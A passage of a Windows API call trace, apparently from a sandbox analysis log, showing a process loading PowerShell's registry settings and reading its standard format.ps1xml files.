RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.936] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed508 | out: phkResult=0xed508*=0x308) returned 0x0 [0084.936] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0xed51c, lpData=0x0, lpcbData=0xed518*=0x0 | out: lpType=0xed51c*=0x1, lpData=0x0, lpcbData=0xed518*=0x74) returned 0x0 [0084.936] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0xed48c, lpData=0x0, lpcbData=0xed488*=0x0 | out: lpType=0xed48c*=0x1, lpData=0x0, lpcbData=0xed488*=0x74) returned 0x0 [0084.936] CoTaskMemAlloc (cb=0x78) returned 0x1c9290 [0084.936] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0xed45c, lpData=0x1c9290, lpcbData=0xed458*=0x74 | out: lpType=0xed45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xed458*=0x74) returned 0x0 [0084.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0084.936] SetErrorMode (uMode=0x1) returned 0x1 [0084.936] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xed3e0 | out: lpFileInformation=0xed3e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0084.937] SetErrorMode (uMode=0x1) returned 0x1 [0084.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0084.938] SetErrorMode (uMode=0x1) returned 0x1 [0084.938] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed3e0 | out: lpFileInformation=0xed3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0084.939] SetErrorMode (uMode=0x1) returned 0x1 [0084.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0084.939] SetErrorMode (uMode=0x1) returned 0x1 [0084.939] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed3e0 | out: lpFileInformation=0xed3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0084.940] SetErrorMode (uMode=0x1) returned 0x1 [0084.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0084.940] SetErrorMode (uMode=0x1) returned 0x1 [0084.940] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed3e0 | out: lpFileInformation=0xed3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0084.941] SetErrorMode (uMode=0x1) returned 0x1 [0084.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0084.941] SetErrorMode (uMode=0x1) returned 0x1 [0084.941] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed3e0 | out: lpFileInformation=0xed3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0084.941] SetErrorMode (uMode=0x1) returned 0x1 [0084.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0084.941] SetErrorMode (uMode=0x1) returned 0x1 [0084.941] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed3e0 | out: lpFileInformation=0xed3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0084.941] SetErrorMode (uMode=0x1) returned 0x1 [0084.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0084.942] SetErrorMode (uMode=0x1) returned 0x1 [0084.942] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed3e0 | out: lpFileInformation=0xed3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0084.942] SetErrorMode (uMode=0x1) returned 0x1 [0084.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0084.942] SetErrorMode (uMode=0x1) returned 0x1 [0084.942] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed3e0 | out: lpFileInformation=0xed3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0084.942] SetErrorMode (uMode=0x1) returned 0x1 [0084.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0084.942] SetErrorMode (uMode=0x1) returned 0x1 [0084.942] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed3e0 | out: lpFileInformation=0xed3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0084.943] SetErrorMode (uMode=0x1) returned 0x1 [0084.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0084.943] SetErrorMode (uMode=0x1) returned 0x1 [0084.943] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed3e0 | out: lpFileInformation=0xed3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0084.943] SetErrorMode (uMode=0x1) returned 0x1 [0084.944] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0084.945] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0084.945] CoTaskMemFree (pv=0x1f7740) [0084.954] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0084.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0084.955] CoTaskMemFree (pv=0x1f7740) [0084.955] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0084.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0084.955] CoTaskMemFree (pv=0x1f7740) [0084.956] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0084.956] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0084.956] CoTaskMemFree (pv=0x1f7740) [0084.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xecaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0084.956] SetErrorMode (uMode=0x1) returned 0x1 [0084.957] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c [0084.957] GetFileType (hFile=0x30c) returned 0x1 [0084.957] SetErrorMode (uMode=0x1) returned 0x1 [0084.957] GetFileType (hFile=0x30c) returned 0x1 [0084.957] ReadFile (in: hFile=0x30c, lpBuffer=0x316c290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x316c290*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0084.968] ReadFile (in: hFile=0x30c, lpBuffer=0x316c290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x316c290*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0084.969] ReadFile (in: hFile=0x30c, lpBuffer=0x316c290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x316c290*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0084.969] ReadFile (in: hFile=0x30c, lpBuffer=0x316c290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x316c290*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0084.969] ReadFile (in: hFile=0x30c, lpBuffer=0x316c290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x316c290*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0084.970] ReadFile (in: hFile=0x30c, lpBuffer=0x316c290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x316c290*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0084.970] ReadFile (in: hFile=0x30c, lpBuffer=0x316c290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x316c290*, lpNumberOfBytesRead=0xed078*=0x9e2, lpOverlapped=0x0) returned 1 [0084.970] ReadFile (in: hFile=0x30c, lpBuffer=0x316b7da, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x316b7da*, lpNumberOfBytesRead=0xed078*=0x0, lpOverlapped=0x0) returned 1 [0084.970] ReadFile (in: hFile=0x30c, lpBuffer=0x316c290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x316c290*, lpNumberOfBytesRead=0xed078*=0x0, lpOverlapped=0x0) returned 1 [0084.970] CloseHandle (hObject=0x30c) returned 1 [0084.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xecdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0084.970] SetErrorMode (uMode=0x1) returned 0x1 [0084.970] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed020 | out: lpFileInformation=0xed020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0084.971] SetErrorMode (uMode=0x1) returned 0x1 [0084.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0084.971] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed108 | out: phkResult=0xed108*=0x30c) returned 0x0 [0084.971] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed08c, lpData=0x0, lpcbData=0xed088*=0x0 | out: lpType=0xed08c*=0x1, lpData=0x0, lpcbData=0xed088*=0x56) returned 0x0 [0084.971] CoTaskMemAlloc (cb=0x5a) returned 0x1c6d10 [0084.971] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed05c, lpData=0x1c6d10, lpcbData=0xed058*=0x56 | out: lpType=0xed05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed058*=0x56) returned 0x0 [0084.971] CoTaskMemFree (pv=0x1c6d10) [0084.971] RegCloseKey (hKey=0x30c) returned 0x0 [0084.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0084.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0085.080] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x6cc2eaf2, Data2=0x969b, Data3=0x4167, Data4=([0]=0xbd, [1]=0x73, [2]=0xac, [3]=0x18, [4]=0x4d, [5]=0x9, [6]=0xd, [7]=0xcb))) returned 0x0 [0085.098] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x346335d0, Data2=0x4b50, Data3=0x4424, Data4=([0]=0x95, [1]=0x2a, [2]=0x6, [3]=0x17, [4]=0x57, [5]=0x6f, [6]=0x51, [7]=0x6b))) returned 0x0 [0085.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0085.100] SetErrorMode (uMode=0x1) returned 0x1 [0085.100] SetErrorMode (uMode=0x1) returned 0x1 [0085.100] GetFileType (hFile=0x30c) returned 0x1 [0085.100] ReadFile (in: hFile=0x30c, lpBuffer=0x3196df8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3196df8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.102] ReadFile (in: hFile=0x30c, lpBuffer=0x3196df8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3196df8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.103] ReadFile (in: hFile=0x30c, lpBuffer=0x3196df8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3196df8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.103] ReadFile (in: hFile=0x30c, lpBuffer=0x3196df8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3196df8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.103] ReadFile (in: hFile=0x30c, lpBuffer=0x3196df8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3196df8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.104] ReadFile (in: hFile=0x30c, lpBuffer=0x3196df8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3196df8*, lpNumberOfBytesRead=0xed078*=0xfb2, lpOverlapped=0x0) returned 1 [0085.104] ReadFile (in: hFile=0x30c, lpBuffer=0x3196512, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3196512*, lpNumberOfBytesRead=0xed078*=0x0, lpOverlapped=0x0) returned 1 [0085.104] ReadFile (in: hFile=0x30c, lpBuffer=0x3196df8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3196df8*, lpNumberOfBytesRead=0xed078*=0x0, lpOverlapped=0x0) returned 1 [0085.104] CloseHandle (hObject=0x30c) returned 1 [0085.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0085.104] SetErrorMode (uMode=0x1) returned 0x1 [0085.104] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed020 | out: lpFileInformation=0xed020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0085.104] SetErrorMode (uMode=0x1) returned 0x1 [0085.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0085.105] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed108 | out: phkResult=0xed108*=0x30c) returned 0x0 [0085.105] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed08c, lpData=0x0, lpcbData=0xed088*=0x0 | out: lpType=0xed08c*=0x1, lpData=0x0, lpcbData=0xed088*=0x56) returned 0x0 [0085.105] CoTaskMemAlloc (cb=0x5a) returned 0x1c6d10 [0085.105] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed05c, lpData=0x1c6d10, lpcbData=0xed058*=0x56 | out: lpType=0xed05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed058*=0x56) returned 0x0 [0085.105] CoTaskMemFree (pv=0x1c6d10) [0085.105] RegCloseKey (hKey=0x30c) returned 0x0 [0085.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0085.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0085.106] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x4cadcc85, Data2=0x7a3b, Data3=0x47ff, Data4=([0]=0xa0, [1]=0xdd, [2]=0xe2, [3]=0xd3, [4]=0xd7, [5]=0x50, [6]=0xe6, [7]=0x9d))) returned 0x0 [0085.110] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xd136edc0, Data2=0x3ba8, Data3=0x461b, Data4=([0]=0xa7, [1]=0xf6, [2]=0x5c, [3]=0xe4, [4]=0x5d, [5]=0xa3, [6]=0x45, [7]=0x8d))) returned 0x0 [0085.151] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xa08df66a, Data2=0x1040, Data3=0x49ef, Data4=([0]=0x95, [1]=0x4b, [2]=0x43, [3]=0x44, [4]=0x35, [5]=0xd, [6]=0xbd, [7]=0xd7))) returned 0x0 [0085.151] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x93d710de, Data2=0xc949, Data3=0x484f, Data4=([0]=0x96, [1]=0xcd, [2]=0x18, [3]=0xce, [4]=0x4, [5]=0x9d, [6]=0x9f, [7]=0x74))) returned 0x0 [0085.151] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xb7e86ada, Data2=0x3a48, Data3=0x43f4, Data4=([0]=0xa4, [1]=0x1b, [2]=0xf3, [3]=0xc9, [4]=0x23, [5]=0x7a, [6]=0xc8, [7]=0xd4))) returned 0x0 [0085.151] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x4dd042a1, Data2=0x640e, Data3=0x416f, Data4=([0]=0x9d, [1]=0x7c, [2]=0xf8, [3]=0x88, [4]=0x8a, [5]=0x5c, [6]=0x11, [7]=0x2c))) returned 0x0 [0085.152] GetFullPathNameW (in: 